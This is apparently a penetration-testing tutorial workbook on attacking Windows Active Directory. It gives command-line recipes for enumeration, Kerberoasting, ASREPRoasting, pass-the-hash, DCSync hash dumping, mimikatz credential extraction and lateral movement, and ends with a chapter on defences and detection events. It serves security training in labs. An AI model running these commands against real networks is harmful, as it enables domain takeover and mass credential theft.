๐Ÿ”’

Sign In Required

This workbook requires a free KaliRange account.

Log In โ†’Create Account
๐Ÿ‘ถ
New to Active Directory? AD is the central authentication and authorisation system in 90%+ of corporate Windows networks. It's the crown jewel โ€” and the most common target in real-world attacks. This workbook is the starting point; practice on TryHackMe's AD labs.

Chapter 1 โ€” AD Fundamentals

# Active Directory = Microsoft's directory service for managing Windows networks

# Key components:
Domain Controller (DC) โ†’ server running AD DS; manages authentication
Domain              โ†’ e.g. CORP.LOCAL โ€” logical boundary for AD
Forest              โ†’ collection of domains sharing schema
OU (Org Unit)       โ†’ container for organising objects (like folders)
GPO                 โ†’ Group Policy Object โ€” settings pushed to all machines

# AD objects:
Users    โ†’ People + service accounts (svc_sql, svc_web)
Computers โ†’ Domain-joined workstations and servers
Groups   โ†’ Collection of users/computers
โ†’ Security groups: grant permissions
โ†’ Distribution groups: email lists

# Privileged groups (pentest targets):
Domain Admins โ†’ full control of domain
Enterprise Admins โ†’ full control of forest
Schema Admins โ†’ can modify AD schema
Administrators โ†’ local admin on DC

Chapter 2 โ€” Kerberos Authentication

# Kerberos = ticket-based auth protocol (port 88)
# Understanding it is crucial to understanding AD attacks

1. Authentication Service (AS) Exchange:
   User โ†’ DC: "I'm Alice, here's my password hash (AS-REQ)"
   DC  โ†’ User: "Here's your TGT" (Ticket Granting Ticket)

2. Ticket Granting Service (TGS) Exchange:
   User โ†’ DC: "I want to access the SQL server" (TGS-REQ with TGT)
   DC  โ†’ User: "Here's a service ticket for SQL" (TGS-REP)

3. Application Request:
   User โ†’ SQL Server: "Here's my ticket" (AP-REQ)
   SQL Server verifies ticket โ†’ grants access

# Key attack points:
# TGT encrypted with KRBTGT hash โ†’ Golden Ticket attack
# Service ticket encrypted with SERVICE ACCOUNT HASH โ†’ Kerberoasting
# AS-REQ can be made without pre-auth โ†’ ASREPRoasting

Chapter 3 โ€” AD Enumeration

# With a foothold (domain user credentials)
# Even a low-privilege user can enumerate almost everything in AD!

# PowerView (PowerShell) โ€” most powerful AD enum tool
Import-Module .\PowerView.ps1

Get-Domain                    # domain info
Get-DomainController          # DC info
Get-DomainUser                # all users
Get-DomainUser -SPN           # service accounts (Kerberoasting targets)
Get-DomainGroup               # all groups
Get-DomainGroup "Domain Admins" | Select-Object Member
Get-DomainComputer            # all computers
Get-DomainGPO                 # Group Policy Objects
Find-LocalAdminAccess         # where do you have local admin?

# From Linux with valid credentials:
# crackmapexec
crackmapexec smb 192.168.1.0/24 -u alice -p Password123
crackmapexec smb DC_IP -u alice -p Password123 --users
crackmapexec smb DC_IP -u alice -p Password123 --groups

# ldapsearch (query AD via LDAP)
ldapsearch -x -H ldap://DC_IP -D "alice@corp.local" -w Password123 \
  -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName

Chapter 4 โ€” BloodHound

# BloodHound maps AD relationships and finds attack paths to DA

# Step 1: Collect data with SharpHound (Windows)
.\SharpHound.exe --CollectionMethods All --Domain corp.local
# Outputs: 20240615_BloodHound.zip

# Or from Linux with BloodHound.py:
pip3 install bloodhound
bloodhound-python -u alice -p Password123 -d corp.local -ns DC_IP -c All

# Step 2: Start neo4j and BloodHound
sudo neo4j start
bloodhound &
# Upload the zip file โ†’ Drag and drop into BloodHound

# Step 3: Useful queries in BloodHound:
Find All Domain Admins
Find Shortest Paths to Domain Admins
Find Principals with DCSync Rights
Find Computers where Domain Users are Local Admin
Find AS-REP Roastable Users
Find Kerberoastable Users

# BloodHound shows: Alice โ†’ MemberOf โ†’ IT_ADMINS โ†’ AdminTo โ†’ FILESERVER01
# Then: FILESERVER01 โ†’ has session โ†’ Domain Admin
# Attack path: compromise Alice โ†’ pivot to FILESERVER01 โ†’ steal DA creds

Chapter 5 โ€” Kerberoasting

# Service accounts have SPNs (Service Principal Names)
# Anyone can request a service ticket for any SPN
# Ticket is encrypted with SERVICE ACCOUNT'S NTLM hash
# Take ticket offline โ†’ crack hash โ†’ get plaintext password

# Impacket GetUserSPNs.py (from Linux)
GetUserSPNs.py corp.local/alice:Password123 -dc-ip DC_IP -request
# Outputs Kerberos hashes:
# $krb5tgs$23$*svc_sql$CORP.LOCAL$corp.local/svc_sql*$...

# PowerView (from Windows)
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv spns.csv

# Crack with hashcat (mode 13100 = Kerberoasting)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
# If cracked: svc_sql's password is "Summer2024!"

# Defence: use very long random service account passwords (25+ chars)
# Managed Service Accounts (MSA) rotate automatically โ€” use them!

Chapter 6 โ€” ASREPRoasting

# Users with "Do not require Kerberos pre-authentication" can be attacked
# No credentials needed โ€” just a username!

# From Linux with impacket:
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip DC_IP -no-pass
# Returns AS-REP hashes for vulnerable accounts

# If you have credentials already, find all vulnerable accounts:
GetNPUsers.py corp.local/alice:Password123 -dc-ip DC_IP -request

# Crack with hashcat (mode 18200 = AS-REP)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With PowerView:
Get-DomainUser -PreauthNotRequired

Chapter 7 โ€” Pass the Hash (PtH)

# You have an NTLM hash but don't know the plaintext password
# NTLM authentication works with the hash directly โ€” no cracking needed!

# Extract hashes from local SAM (requires local admin):
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Or from a live system:
secretsdump.py administrator:Password123@192.168.1.10
# Output: Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::

# Format: Username:RID:LM_HASH:NT_HASH
# The NT hash (last part) is what you use for PtH

# PtH with crackmapexec:
crackmapexec smb 192.168.1.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
# [+] 192.168.1.50  Administrator (Pwn3d!) โ† you have local admin!

# PtH with impacket psexec:
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.50

Chapter 8 โ€” DCSync Attack

# DCSync mimics a Domain Controller replication request
# Dump all password hashes from AD (including KRBTGT โ†’ Golden Ticket)
# Requires: Domain Admin OR DCSync rights (Replication privileges)

# Dump all hashes from DC:
secretsdump.py -just-dc corp.local/administrator:Password123@DC_IP

# Get KRBTGT hash (for Golden Ticket):
secretsdump.py -just-dc-user krbtgt corp.local/administrator:Password123@DC_IP
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:KRBTGT_HASH:::

# With mimikatz (on Windows):
lsadump::dcsync /domain:corp.local /user:krbtgt

# KRBTGT hash โ†’ create Golden Ticket โ†’ unlimited DA access
# (valid until KRBTGT password changes twice)

Chapter 9 โ€” Lateral Movement

# Moving from one machine to another in the network

# WMI execution (Windows Management Instrumentation)
wmiexec.py corp.local/administrator:Password123@192.168.1.50
# or PtH:
wmiexec.py -hashes :NTHASH administrator@192.168.1.50

# SMB execution
psexec.py corp.local/administrator:Password123@192.168.1.50
smbexec.py corp.local/administrator:Password123@192.168.1.50

# RDP with stolen credentials
xfreerdp /u:administrator /p:Password123 /v:192.168.1.50

# Evil-WinRM (PowerShell remoting over WinRM port 5985)
evil-winrm -i 192.168.1.50 -u administrator -p Password123
evil-winrm -i 192.168.1.50 -u administrator -H NTHASH

# Once on machine โ€” check for more credentials:
mimikatz: sekurlsa::logonpasswords   โ†’ dump credentials from memory
          sekurlsa::wdigest          โ†’ plaintext passwords (legacy)
          lsadump::sam               โ†’ local SAM database

Chapter 10 โ€” AD Defence

# Defending Active Directory

Tiered Admin Model:
  Tier 0: Domain Controllers + Domain Admins (most privileged)
  Tier 1: Servers + Server Admins
  Tier 2: Workstations + Helpdesk
  Rule: Tier 0 admins NEVER log into Tier 1/2 machines
  (prevents hash theft from compromised workstations)

# Technical controls:
โ†’ Credential Guard    : protects LSASS, prevents mimikatz
โ†’ PAW                 : Privileged Access Workstations
โ†’ LAPS                : randomises local admin passwords per machine
โ†’ Microsoft ATA/MDI   : detects Kerberoasting, PtH, DCSync attempts
โ†’ Audit Logging       : log all privileged account usage
โ†’ Disable NTLM        : force Kerberos (harder to PtH)
โ†’ Service accounts    : use MSA/gMSA with 120-char auto-rotated passwords
โ†’ Protected Users group: prevents caching of credentials

# Detection indicators (Blue Team):
Kerberoasting  โ†’ Event 4769 (TGS request) with RC4 encryption type
ASREPRoasting  โ†’ Event 4768 with Pre-auth type 0
DCSync         โ†’ Event 4662 (replication rights used from non-DC)
Pass-the-Hash  โ†’ Event 4624 logon type 3, NTLM, no logon hours
โœ…
Workbook Complete! Active Directory attacks are the path to Domain Admin in 90% of real penetration tests. Practice on HackTheBox Pro Labs (Offshore, RastaLabs) or TryHackMe's AD rooms.
Practice: AD Basics Lab โ†’ โ† All Workbooks
๐Ÿ“–
Sign in to track progress